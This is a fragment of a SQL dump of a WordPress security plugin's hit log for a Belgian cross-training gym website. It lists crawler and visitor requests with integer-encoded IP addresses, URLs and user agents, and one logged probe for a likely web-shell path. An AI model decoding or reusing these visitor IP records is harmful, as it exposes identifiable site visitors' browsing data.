(72891, 1495015608.513500, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72892, 1495015613.117772, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72893, 1495015617.689147, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72894, 1495020635.180341, 632936182, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72895, 1495024317.672399, 2503519569, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(72896, 1495027760.335194, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72897, 1495027760.528571, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72898, 1495030761.064527, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72899, 1495030761.874369, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72900, 1495030762.348589, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72901, 1495030762.770413, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72902, 1495030763.446877, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72903, 1495030763.933538, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72904, 1495030764.414277, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72905, 1495030765.240912, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72906, 1495030765.906928, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72907, 1495030767.753653, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72908, 1495030768.245275, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72909, 1495030768.909427, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72910, 1495030770.064141, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72911, 1495030770.471783, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72912, 1495031540.802819, 3024883467, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/js/\\\'+m.iframeSrc+\\\'', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72913, 1495031919.795939, 872366417, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72914, 1495031939.545386, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72915, 1495032646.567509, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72916, 1495032647.095220, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72917, 1495037155.935152, 1584254022, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72918, 1495038712.507721, 1342987974, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.clublesmills.com/recherche/profil_club.php?id=12573', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(72919, 1495038714.706957, 1342987974, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72920, 1495038951.487680, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72921, 1495038951.982450, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72922, 1495038967.614628, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72923, 1495038973.021821, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72924, 1495039145.522785, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72925, 1495039146.033030, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72926, 1495041759.068654, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(72927, 1495041759.670782, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(72928, 1495045388.314418, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72929, 1495045388.779902, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72930, 1495045389.222414, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72931, 1495045389.619250, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72932, 1495045390.334263, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72933, 1495045390.788642, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72934, 1495045391.276278, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72935, 1495045391.787130, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72936, 1495045392.209342, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72937, 1495045392.631178, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72938, 1495045393.021182, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72939, 1495045393.536885, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72940, 1495045393.970701, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72941, 1495045394.387669, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72942, 1495045550.290341, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72943, 1495045551.026232, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72944, 1495045551.432201, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72945, 1495045551.844655, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72946, 1495045552.274126, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72947, 1495045552.706737, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72948, 1495045553.245866, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72949, 1495045553.667188, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72950, 1495045554.191264, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72951, 1495045554.657696, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72952, 1495045555.077884, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72953, 1495045567.543599, 1834524421, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72954, 1495045571.631030, 1834524421, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72955, 1495045774.912257, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72956, 1495046654.237513, 1538350214, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72957, 1495046744.724590, 1538350214, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72958, 1495046792.898260, 1538350214, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72959, 1495046799.705460, 1538350214, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72960, 1495053788.333367, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72961, 1495053788.795832, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72962, 1495053789.220263, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72963, 1495053789.639142, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72964, 1495053790.133557, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72965, 1495053790.629933, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72966, 1495053791.044750, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72967, 1495053791.546843, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72968, 1495053791.967529, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72969, 1495053792.419092, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72970, 1495053792.920764, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72971, 1495053793.432555, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72972, 1495053793.927616, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72973, 1495053794.346873, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72974, 1495055298.670013, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72975, 1495059885.406104, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72976, 1495066896.151763, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72977, 1495067232.400790, 1538452237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72978, 1495067232.991449, 1538452237, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72979, 1495067233.509674, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72980, 1495067234.034648, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72981, 1495067234.654837, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72982, 1495067235.158110, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72983, 1495067235.619687, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72984, 1495067236.094212, 1538452237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72985, 1495067236.554804, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72986, 1495067236.980625, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72987, 1495067237.416785, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72988, 1495067237.923722, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72989, 1495067238.420654, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72990, 1495067238.908144, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72991, 1495070999.214559, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72992, 1495070999.294702, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72993, 1495084583.583570, 1539837019, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.28.70 (KHTML, like Gecko) Chrome/53.7.2988.8250 Safari/531.88'),
(72994, 1495084588.599996, 1539837019, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.28.70 (KHTML, like Gecko) Chrome/53.7.2988.8250 Safari/531.88'),
(72995, 1495092231.001128, 86661764, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/modules.php', 'http://crosstrainingcenter.be/wp-includes/css/modules.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72996, 1495094785.722117, 786801764, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(72997, 1495095557.363493, 3024883478, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72998, 1495096258.441665, 3488736748, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)'),
(72999, 1495107714.364261, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&sqi=2&ved=0ahUKEwjtxsmervnTAhUNZFAKHQZDCHgQ_BcIjAEwEA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(73000, 1495113381.886059, 1538646836, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73001, 1495114269.390292, 1834607884, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73002, 1495114287.605551, 1834607884, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73003, 1495114308.826691, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73004, 1495114308.826858, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73005, 1495116177.669795, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73006, 1495116178.169492, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73007, 1495117342.023627, 783539426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73008, 1495117342.615376, 783539426, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73009, 1495117343.122395, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73010, 1495117343.628144, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73011, 1495117344.145003, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
